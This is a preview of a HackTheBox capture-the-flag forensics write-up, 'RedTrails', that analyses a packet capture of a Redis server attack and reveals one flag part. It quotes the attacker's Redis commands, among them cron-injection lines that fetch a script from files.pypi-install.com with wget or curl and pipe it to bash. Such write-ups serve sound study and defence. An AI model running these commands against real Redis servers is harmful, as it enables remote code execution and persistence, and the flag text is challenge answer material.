forensicsfreehard

RedTrails

hackthebox

Task: analyze a pcap of a Redis server attack to find a three-part flag hidden across data exfiltration, obfuscated bash malware, and AES-encrypted command output. Solution: parse Redis RESP protocol for flag part in user email, deobfuscate reversed-base64 bash script for SSH key comment, reverse engineer .so module to extract AES-256-CBC key/IV and decrypt system.exec responses.

$ ls tags/ techniques/

rce encryption pcap aes malware bash_obfuscation redis rogue_server cryptominer cron_persistence

bash_deobfuscationaes_256_cbc_decryptionredis_rogue_serverredis_resp_parsingelf_reverse_engineeringcron_job_injectionredis_module_rcesplit_flag_recovery

$ cat /etc/rate-limit

Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.

RedTrails — HackTheBox

Description

Analyze a pcap capture file (capture.pcap, 291707 bytes) containing network traffic of a Redis server attack. The flag is split into three parts hidden across different stages of the attack.

Files provided:

capture.pcap — Network capture (291707 bytes)

Analysis

Network Topology

Three hosts identified in the capture:

Host	Role	Details
10.10.0.15	Attacker	Initiates Redis commands, hosts rogue Redis master
10.10.0.90:6379	Victim	Redis server (target)
10.10.0.50	C2 Server	`files.pypi-install.com` — malware distribution

Protocols: Redis (RESP), HTTP, TLS. Multiple TCP streams covering the full attack lifecycle.

Attack Flow Overview

The attack follows a classic Redis exploitation chain:

Weak Auth → Data Exfil → Cron Persistence → Rogue Server RCE → Cryptominer Deployment

Phase 1 — Initial Access & Data Exfiltration

TCP stream 0 (10.10.0.15:38342 → 10.10.0.90:6379)

The attacker authenticates and performs reconnaissance:

AUTH 1943567864              # Weak numeric password
COMMAND DOCS                 # Enumerate available commands
INFO                         # Server information
KEYS *                       # List all keys
HGETALL users_table          # Exfiltrate user data

The HGETALL users_table response contains 10 users with MD5 password hashes and emails. Among them:

henry6159 → email: FLAG_PART:_c0uld_0p3n_n3w

🚩 FLAG PART 2: _c0uld_0p3n_n3w

Cron Job Injection

The attacker then pivots to persistence:

CONFIG SET DIR /var/spool/cron
CONFIG SET DBFILENAME root
SET cron1 "\n*/1 * * * * wget -q -O- http://files.pypi-install.com/packages/VgLy8V0Zxo | bash\n"
SET cron2 "\n*/1 * * * * curl -fsSL http://files.pypi-install.com/packages/VgLy8V0Zxo | bash\n"
SET cron3 "\n*/1 * * * * cd /tmp && wget -q http://files.pypi-install.com/packages/VgLy8V0Zxo -O .cache && bash .cache\n"
SAVE
CONFIG SET DIR /var/spool/cron/crontabs
SAVE

...

$ grep --similar

Similar writeups

[forensics][free]Obscure— hackthebox
[forensics][Pro]Baby Exfil— uoftctf2026
[forensics][Pro]exFill— grodno_new_year_2026
[forensics][Pro]Офисный Хакер (Office Hacker)— duckerz
[forensics][Pro]Зашифрованный трафик (Encrypted Traffic)— hackerlab